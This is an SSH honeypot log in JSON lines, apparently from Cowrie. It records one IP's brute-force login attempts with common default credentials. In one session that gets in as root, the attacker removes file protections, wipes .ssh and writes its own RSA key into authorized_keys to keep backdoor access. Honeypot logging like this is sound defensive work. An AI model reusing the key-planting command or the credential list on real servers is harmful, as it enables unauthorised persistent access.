{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:59:41.708836Z","src_ip":"212.227.235.229","session":"527ba3148759"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"abc123","message":"login attempt [db1inst1/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:59:42.071115Z","src_ip":"212.227.235.229","session":"527ba3148759"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:59:43.154433Z","src_ip":"212.227.235.229","session":"527ba3148759"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55852,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd5f55090a19","protocol":"ssh","message":"New connection: 212.227.235.229:55852 (1.2.3.4:22) [session: cd5f55090a19]","sensor":"my-vps","timestamp":"2025-09-09T05:59:56.417025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:59:56.417759Z","src_ip":"212.227.235.229","session":"cd5f55090a19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:59:56.599383Z","src_ip":"212.227.235.229","session":"cd5f55090a19"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"abc123","message":"login attempt [db1inst1/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:59:57.368118Z","src_ip":"212.227.235.229","session":"cd5f55090a19"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:59:58.548768Z","src_ip":"212.227.235.229","session":"cd5f55090a19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33018,"dst_ip":"1.2.3.4","dst_port":22,"session":"69b971d79680","protocol":"ssh","message":"New connection: 212.227.235.229:33018 (1.2.3.4:22) [session: 69b971d79680]","sensor":"my-vps","timestamp":"2025-09-09T06:00:07.605849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:00:07.619807Z","src_ip":"212.227.235.229","session":"69b971d79680"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:00:07.787126Z","src_ip":"212.227.235.229","session":"69b971d79680"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"password123","message":"login attempt [nexus/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:00:08.469166Z","src_ip":"212.227.235.229","session":"69b971d79680"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:00:09.643242Z","src_ip":"212.227.235.229","session":"69b971d79680"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64938,"dst_ip":"1.2.3.4","dst_port":22,"session":"04932a6b05b7","protocol":"ssh","message":"New connection: 212.227.235.229:64938 (1.2.3.4:22) [session: 04932a6b05b7]","sensor":"my-vps","timestamp":"2025-09-09T06:00:10.238601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:00:10.239537Z","src_ip":"212.227.235.229","session":"04932a6b05b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:00:10.369251Z","src_ip":"212.227.235.229","session":"04932a6b05b7"}
{"eventid":"cowrie.login.failed","username":"public","password":"111","message":"login attempt [public/111] failed","sensor":"my-vps","timestamp":"2025-09-09T06:00:10.921061Z","src_ip":"212.227.235.229","session":"04932a6b05b7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:00:12.046966Z","src_ip":"212.227.235.229","session":"04932a6b05b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49338,"dst_ip":"1.2.3.4","dst_port":22,"session":"edf06dd31bb6","protocol":"ssh","message":"New connection: 212.227.235.229:49338 (1.2.3.4:22) [session: edf06dd31bb6]","sensor":"my-vps","timestamp":"2025-09-09T06:00:13.781728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:00:13.782469Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:00:13.870061Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789abc","message":"login attempt [root/123456789abc] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:00:14.256858Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:00:14.483178Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:00:14.483927Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:00:14.485281Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:00:14.573447Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:00:14.766031Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:00:14.766967Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:00:14.856154Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:00:14.857223Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49494,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9e9d134ba44","protocol":"ssh","message":"New connection: 212.227.235.229:49494 (1.2.3.4:22) [session: f9e9d134ba44]","sensor":"my-vps","timestamp":"2025-09-09T06:00:14.901483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:00:14.902495Z","src_ip":"212.227.235.229","session":"f9e9d134ba44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:00:14.969870Z","src_ip":"212.227.235.229","session":"f9e9d134ba44"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:00:15.277143Z","src_ip":"212.227.235.229","session":"f9e9d134ba44"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:00:16.345120Z","src_ip":"212.227.235.229","session":"f9e9d134ba44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49690,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c512044a3fb","protocol":"ssh","message":"New connection: 212.227.235.229:49690 (1.2.3.4:22) [session: 1c512044a3fb]","sensor":"my-vps","timestamp":"2025-09-09T06:00:16.453088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:00:16.454162Z","src_ip":"212.227.235.229","session":"1c512044a3fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:00:16.541433Z","src_ip":"212.227.235.229","session":"1c512044a3fb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:00:16.931381Z","src_ip":"212.227.235.229","session":"1c512044a3fb"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:00:17.020306Z","src_ip":"212.227.235.229","session":"edf06dd31bb6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:00:17.021422Z","src_ip":"212.227.235.229","session":"1c512044a3fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39268,"dst_ip":"1.2.3.4","dst_port":22,"session":"57873d315cf3","protocol":"ssh","message":"New connection: 212.227.235.229:39268 (1.2.3.4:22) [session: 57873d315cf3]","sensor":"my-vps","timestamp":"2025-09-09T06:00:33.100484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:00:33.101414Z","src_ip":"212.227.235.229","session":"57873d315cf3"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:00:33.343314Z","src_ip":"212.227.235.229","session":"57873d315cf3"}
{"eventid":"cowrie.login.failed","username":"tester","password":"tester@123","message":"login attempt [tester/tester@123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:00:34.354877Z","src_ip":"212.227.235.229","session":"57873d315cf3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:00:35.599827Z","src_ip":"212.227.235.229","session":"57873d315cf3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33926,"dst_ip":"1.2.3.4","dst_port":22,"session":"14883aaa24ea","protocol":"ssh","message":"New connection: 212.227.235.229:33926 (1.2.3.4:22) [session: 14883aaa24ea]","sensor":"my-vps","timestamp":"2025-09-09T06:00:48.221522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:00:48.222805Z","src_ip":"212.227.235.229","session":"14883aaa24ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:00:48.344520Z","src_ip":"212.227.235.229","session":"14883aaa24ea"}
{"eventid":"cowrie.login.failed","username":"debian","password":"Welcome1","message":"login attempt [debian/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:00:48.658570Z","src_ip":"212.227.235.229","session":"14883aaa24ea"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:00:49.740746Z","src_ip":"212.227.235.229","session":"14883aaa24ea"}
